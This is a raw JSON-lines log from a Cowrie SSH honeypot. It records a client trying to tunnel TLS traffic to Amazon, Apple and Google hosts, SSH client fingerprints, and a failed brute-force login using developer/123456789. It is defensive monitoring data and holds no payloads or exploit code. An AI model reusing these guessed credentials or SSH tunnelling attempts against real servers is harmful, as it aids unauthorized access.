{"eventid":"cowrie.direct-tcpip.request","dst_ip":"52.49.106.241","dst_port":443,"src_ip":"185.156.73.233","src_port":43110,"message":"direct-tcp connection request to 52.49.106.241:443 from 127.0.0.1:43110","sensor":"my-vps","timestamp":"2025-08-31T01:27:26.497743Z","session":"836b58ec3fcf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"52.49.106.241","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03;\\x85\\xc1n33E\\x14\\xb0\\x85\\x07\\xb4f\\xbf\\t\\x07;G\\x06\\x92\\xb1\\xe8[\\x9f\\xd17EjL\\xfc\\x94  g~D\\xb4\\x93`\\xf5\\xb6\\xa4\\xcf\\x8f\\xd9\\x96\\xc4\\x7f\\x12T\\x9eiwMx\\xf8\\x13\\xcd\\x840K\\xa6\\xb6\\xd8\\x85\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x9aPr\\xd7M\\xdf\\xf0\\xd8\\xae`t3EC< \\x16f\\x97\\x8f\\xcd?&z\\x8dA\\xff\\xba\\x94\\xcf\\xf79\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 52.49.106.241:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03;\\x85\\xc1n33E\\x14\\xb0\\x85\\x07\\xb4f\\xbf\\t\\x07;G\\x06\\x92\\xb1\\xe8[\\x9f\\xd17EjL\\xfc\\x94  g~D\\xb4\\x93`\\xf5\\xb6\\xa4\\xcf\\x8f\\xd9\\x96\\xc4\\x7f\\x12T\\x9eiwMx\\xf8\\x13\\xcd\\x840K\\xa6\\xb6\\xd8\\x85\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x9aPr\\xd7M\\xdf\\xf0\\xd8\\xae`t3EC< \\x16f\\x97\\x8f\\xcd?&z\\x8dA\\xff\\xba\\x94\\xcf\\xf79\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T01:27:26.527969Z","src_ip":"185.156.73.233","session":"836b58ec3fcf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"23.53.244.237","dst_port":443,"src_ip":"185.156.73.233","src_port":43434,"message":"direct-tcp connection request to 23.53.244.237:443 from 127.0.0.1:43434","sensor":"my-vps","timestamp":"2025-08-31T01:27:26.550384Z","session":"836b58ec3fcf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"23.53.244.237","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x11\\xf2m\\xad\\x81\\xe2\\x19:f\\x02{\\xc6\\x08[\\xe7\\x9b^e~\\xb3\\xf0B\\xffV\\xdc\\xa3$\\xcc\\x05<\\xbd\\x80 #\\xd6(\\x9f\\x0f\\x1cB\\xb1\\xc2\\xa8\\xb7\\xb86\\xc8\\r\\x85>\\xb9\\xd2\\x8cJ\\x83A9\"\\xdd\\x81\",W8n\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 c\\x1f\\x83\\xdc\\x87\\xec\\xe8\\xeb\\x8e\\x9e`\\xd6\\x15\\xe4\\xda\\xae\\x9eU#\\xeb\\xe6\\x0c5\\xd5\\x04~\\x152Y\\x85\\xa4o\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":1,"message":"discarded direct-tcp forward request 1 to 23.53.244.237:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x11\\xf2m\\xad\\x81\\xe2\\x19:f\\x02{\\xc6\\x08[\\xe7\\x9b^e~\\xb3\\xf0B\\xffV\\xdc\\xa3$\\xcc\\x05<\\xbd\\x80 #\\xd6(\\x9f\\x0f\\x1cB\\xb1\\xc2\\xa8\\xb7\\xb86\\xc8\\r\\x85>\\xb9\\xd2\\x8cJ\\x83A9\"\\xdd\\x81\",W8n\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 c\\x1f\\x83\\xdc\\x87\\xec\\xe8\\xeb\\x8e\\x9e`\\xd6\\x15\\xe4\\xda\\xae\\x9eU#\\xeb\\xe6\\x0c5\\xd5\\x04~\\x152Y\\x85\\xa4o\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-08-31T01:27:26.580446Z","src_ip":"185.156.73.233","session":"836b58ec3fcf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.251.36.36","dst_port":443,"src_ip":"185.156.73.233","src_port":43570,"message":"direct-tcp connection request to 142.251.36.36:443 from 127.0.0.1:43570","sensor":"my-vps","timestamp":"2025-08-31T01:27:26.605498Z","session":"836b58ec3fcf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.251.36.36","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03z\\x0f+`\\xc5\\xb6\\x7f\\xa9\\x19U\\xa7\\xbc,9\\xa3l\\xb2\\xcd\\x93\\\\HXT\\xa77\\x13\\x80&\\xbb7\\xc1( \\xe9~x!\\x84\\xe1NL\\x06*\\x1a\\x11r\\xedm\\xd6\\xce\\x9a\\xcd\\x85Q\\x17\\x80\\xacl\\xc2\\xab\\xc6\\x8ba-\\x82\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xe7\\xbau\\xa1\\x07\\xe6\\x068}\\xb5\\t\\xf3\\x88\\x8b\\x98\\x95\\xbc\\x01\\xb0\\xf8x\\xda\\xe1!y\\x88\\xd1\\xd8\\xabuNt\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":2,"message":"discarded direct-tcp forward request 2 to 142.251.36.36:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03z\\x0f+`\\xc5\\xb6\\x7f\\xa9\\x19U\\xa7\\xbc,9\\xa3l\\xb2\\xcd\\x93\\\\HXT\\xa77\\x13\\x80&\\xbb7\\xc1( \\xe9~x!\\x84\\xe1NL\\x06*\\x1a\\x11r\\xedm\\xd6\\xce\\x9a\\xcd\\x85Q\\x17\\x80\\xacl\\xc2\\xab\\xc6\\x8ba-\\x82\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xe7\\xbau\\xa1\\x07\\xe6\\x068}\\xb5\\t\\xf3\\x88\\x8b\\x98\\x95\\xbc\\x01\\xb0\\xf8x\\xda\\xe1!y\\x88\\xd1\\xd8\\xabuNt\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T01:27:26.633359Z","src_ip":"185.156.73.233","session":"836b58ec3fcf"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:27:26.675765Z","src_ip":"185.156.73.233","session":"836b58ec3fcf"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:27:35.034487Z","src_ip":"212.227.235.229","session":"b44184811555"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:27:35.035246Z","src_ip":"212.227.235.229","session":"b44184811555"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43778,"dst_ip":"1.2.3.4","dst_port":22,"session":"1827f5ad4de8","protocol":"ssh","message":"New connection: 212.227.125.160:43778 (1.2.3.4:22) [session: 1827f5ad4de8]","sensor":"my-vps","timestamp":"2025-08-31T01:27:37.918793Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:27:38.346259Z","src_ip":"212.227.125.160","session":"1827f5ad4de8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:27:38.347272Z","src_ip":"212.227.125.160","session":"1827f5ad4de8"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:27:40.810561Z","src_ip":"115.190.94.119","session":"35babb552f61"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456789","message":"login attempt [developer/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T01:27:41.023663Z","src_ip":"212.227.125.160","session":"1827f5ad4de8"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:27:44.097677Z","src_ip":"212.227.125.160","session":"1827f5ad4de8"}
